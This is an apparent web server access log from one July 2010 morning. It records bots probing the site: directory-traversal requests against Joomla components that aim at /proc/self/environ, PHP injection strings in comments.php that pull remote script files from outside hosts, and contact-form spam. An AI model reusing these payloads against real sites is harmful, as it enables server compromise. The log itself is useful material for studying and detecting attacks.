217.73.239.6 - - [01/Jul/2010:06:01:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:06:01:11 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:06:01:11 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
125.141.91.138 - - [01/Jul/2010:06:01:53 -0500] "GET /logs/access_log.1277424000//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:01:53 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:01:54 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:06:02:31 -0500] "GET /logs/access_log.1276300800//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:06:02:31 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:06:02:32 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:06:03:31 -0500] "GET /logs/access_log.1268352000//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:06:05:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:06:05:13 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:06:05:13 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jul/2010:06:07:51 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.212.6.4 - - [01/Jul/2010:06:07:59 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.212.6.4 - - [01/Jul/2010:06:07:59 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.212.6.4 - - [01/Jul/2010:06:07:59 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
89.212.6.4 - - [01/Jul/2010:06:08:02 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.212.6.4 - - [01/Jul/2010:06:08:02 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.212.6.4 - - [01/Jul/2010:06:08:02 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:04 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:04 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:13 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:13 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:06:08:13 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jul/2010:06:09:08 -0500] "GET /logs/?D=D HTTP/1.0" 200 11588 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.73.239.6 - - [01/Jul/2010:06:09:14 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.807"
212.223.162.135 - - [01/Jul/2010:06:10:44 -0500] "GET /logs/access_log.1276646400/index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
212.223.162.135 - - [01/Jul/2010:06:10:44 -0500] "GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
212.223.162.135 - - [01/Jul/2010:06:10:44 -0500] "GET /logs/index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
80.74.153.40 - - [01/Jul/2010:06:12:39 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.255.193.115 - - [01/Jul/2010:06:14:03 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.255.193.115 - - [01/Jul/2010:06:14:03 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
84.255.193.115 - - [01/Jul/2010:06:14:04 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.255.193.115 - - [01/Jul/2010:06:15:15 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.255.193.115 - - [01/Jul/2010:06:15:16 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
84.255.193.115 - - [01/Jul/2010:06:15:16 -0500] "GET /logs/access_log.1275264000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.182.63.49 - - [01/Jul/2010:06:18:19 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:06:18:19 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.20.196.20 - - [01/Jul/2010:06:20:14 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:06:20:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.189.27.130 - - [01/Jul/2010:06:27:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.121.26.63 - - [01/Jul/2010:06:31:02 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
66.135.41.16 - - [01/Jul/2010:06:31:22 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.195.112.180 - - [01/Jul/2010:06:33:45 -0500] "GET /logs/access_log.1154563200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jul/2010:06:35:03 -0500] "GET /logs/access_log.1262995200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.136.35.223 - - [01/Jul/2010:06:41:07 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
207.46.13.53 - - [01/Jul/2010:06:43:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.141.91.138 - - [01/Jul/2010:06:43:59 -0500] "GET /logs/access_log.1268352000//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:00 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:00 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:02 -0500] "GET /logs/access_log.1268352000//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:02 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:03 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:09 -0500] "GET /logs/access_log.1268352000//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:10 -0500] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:06:44:10 -0500] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
207.46.13.53 - - [01/Jul/2010:06:44:46 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.26.63 - - [01/Jul/2010:06:46:53 -0500] "GET /logs/access_log.1276041600//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.121.26.63 - - [01/Jul/2010:06:46:53 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.121.26.63 - - [01/Jul/2010:06:46:54 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
66.135.41.16 - - [01/Jul/2010:06:46:58 -0500] "GET /logs/access_log.1276041600//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
66.135.41.16 - - [01/Jul/2010:06:46:58 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.135.41.16 - - [01/Jul/2010:06:46:58 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.136.35.223 - - [01/Jul/2010:06:47:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.26.63 - - [01/Jul/2010:06:48:56 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
66.135.41.16 - - [01/Jul/2010:06:48:57 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
119.63.198.26 - - [01/Jul/2010:06:53:37 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 200 524288 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
219.240.36.36 - - [01/Jul/2010:06:57:44 -0500] "GET /logs/access_log.1276041600/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.65"
219.240.36.36 - - [01/Jul/2010:06:57:44 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
219.240.36.36 - - [01/Jul/2010:06:57:45 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
203.120.246.20 - - [01/Jul/2010:07:00:43 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
195.137.160.46 - - [01/Jul/2010:07:02:35 -0500] "GET /logs/access_log.1277164800//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
195.137.160.46 - - [01/Jul/2010:07:02:35 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.137.160.46 - - [01/Jul/2010:07:02:36 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
217.27.252.169 - - [01/Jul/2010:07:03:40 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 404 310 "-"": Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
200.164.110.11 - - [01/Jul/2010:07:07:30 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:07:30 -0500] "GET //index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:07:31 -0500] "GET /logs//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:07:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
121.78.118.123 - - [01/Jul/2010:07:08:34 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.164.110.11 - - [01/Jul/2010:07:10:13 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:10:14 -0500] "GET //index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:10:14 -0500] "GET /logs//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.164.110.11 - - [01/Jul/2010:07:10:34 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [01/Jul/2010:07:14:02 -0500] "GET /logs/access_log.1243641600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.137.160.46 - - [01/Jul/2010:07:14:48 -0500] "GET /logs/access_log.1277164800//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
195.137.160.46 - - [01/Jul/2010:07:14:48 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.137.160.46 - - [01/Jul/2010:07:14:49 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
195.20.196.20 - - [01/Jul/2010:07:15:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:07:15:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:07:15:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
